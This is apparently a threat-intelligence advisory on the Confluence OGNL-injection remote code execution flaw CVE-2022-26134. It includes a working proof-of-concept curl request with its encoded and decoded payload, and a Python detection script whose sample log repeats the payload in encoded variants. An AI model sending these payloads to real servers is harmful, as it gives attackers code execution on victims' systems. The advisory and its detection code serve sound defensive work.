Originally published at: Unauthenticated Confluence RCE Vulnerability (CVE-2022-26134) Actively Exploited in the Wild - CloudSEK
Category: Vulnerability Intelligence
Vulnerability Class: Remote Code Execution
CVE ID: CVE-2022-26134
CVSS:3.0 Score: N/A
Executive Summary
| THREAT | IMPACT | MITIGATION |
|---|---|---|
Overview of CVE-2022-26134
- CVE-2022-26134 is an unauthenticated, remotely exploitable OGNL injection vulnerability in Confluence Server that can lead to remote code execution.
- Due to the public-facing nature of Confluence Servers, the vulnerability poses a high risk of exploitation.
- To exploit the vulnerability, an attacker with network access simply needs to send a specially crafted request to a vulnerable Confluence instance to gain code execution on the target system.
Information from OSINT
- There are at least 9,396 publicly reachable instances of Confluence on the internet.

- Mass scale exploitation for this vulnerability has been observed by multiple sources.
Information from DarkWeb
A significant amount of chatter was observed on cybercrime forums and channels regarding this vulnerability.
Cybercrime forum post discussing CVE-2022-26134
Technical Analysis
CVE-2022-26134 is an unauthenticated OGNL injection vulnerability in the HTTP request handling of Confluence Server.
- To exploit the vulnerability, the OGNL payload is placed in the URI of an HTTP request; the HTTP method used can be any valid or invalid method.
- The attacker-provided URI is translated into a namespace, which is then passed through to OGNL expression evaluation.
curl -v http://{host}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/
Encoded Payload
- The URL-encoded exploit payload above occupies the whole request path: everything from the first character after the leading / up to the trailing /.
${@java.lang.Runtime@getRuntime().exec("touch /tmp/r7")}
Decoded Payload
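Because the payload travels URL-encoded in the request path and the HTTP method is irrelevant, a detection that keys on the raw path or on GET/POST alone will miss requests. The following added example (not part of the original CloudSEK advisory) decodes each request URI from access-log lines and flags OGNL expression syntax of the form seen above. The log lines and IP addresses are constructed for the example; it also decodes repeatedly so that a double-encoded path is inspected in its decoded form.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not real traffic.
# Line 1: the encoded payload from the advisory. Line 4: the same payload
# URL-encoded twice. Line 6: the same payload sent with an invalid method.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Jun/2022:10:15:01 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1" 302 0
203.0.113.11 - - [03/Jun/2022:10:15:02 +0000] "GET /login.action HTTP/1.1" 200 4312
203.0.113.12 - - [03/Jun/2022:10:15:03 +0000] "POST /rest/api/content HTTP/1.1" 201 812
203.0.113.13 - - [03/Jun/2022:10:15:04 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522touch%2520/tmp/r7%2522%2529%257D/ HTTP/1.1" 302 0
203.0.113.14 - - [03/Jun/2022:10:15:05 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 9100
203.0.113.15 - - [03/Jun/2022:10:15:06 +0000] "FOO /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1" 302 0
"""

# The request line: any method token (valid or not), a URI, and the version.
REQUEST_RE = re.compile(r'"(?P<method>[^ ]+) (?P<uri>[^ ]+) HTTP/[0-9.]+"')

# OGNL expression syntax: ${ ... @fully.qualified.Class@ ... }
OGNL_RE = re.compile(r'\$\{.*@[\w.]+@.*\}', re.DOTALL)


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly until the string stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ognl_requests(log_text):
    """Return one record per request whose decoded URI contains OGNL syntax."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        decoded_uri = fully_decode(match.group("uri"))
        if OGNL_RE.search(decoded_uri):
            hits.append({
                "method": match.group("method"),
                "client": line.split(" ", 1)[0],
                "raw_uri": match.group("uri"),
                "decoded_uri": decoded_uri,
            })
    return hits


if __name__ == "__main__":
    for hit in find_ognl_requests(SAMPLE_LOG):
        print(f"{hit['client']} {hit['method']} -> {hit['decoded_uri']}")
```

Run against real access logs, the same function works on any line that carries a quoted request line; the point to carry over into a SIEM rule is to match on the decoded path, not on the raw one, and not to restrict the match to well-formed HTTP methods.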
Impact & Mitigation
| Impact | Mitigation |
|---|---|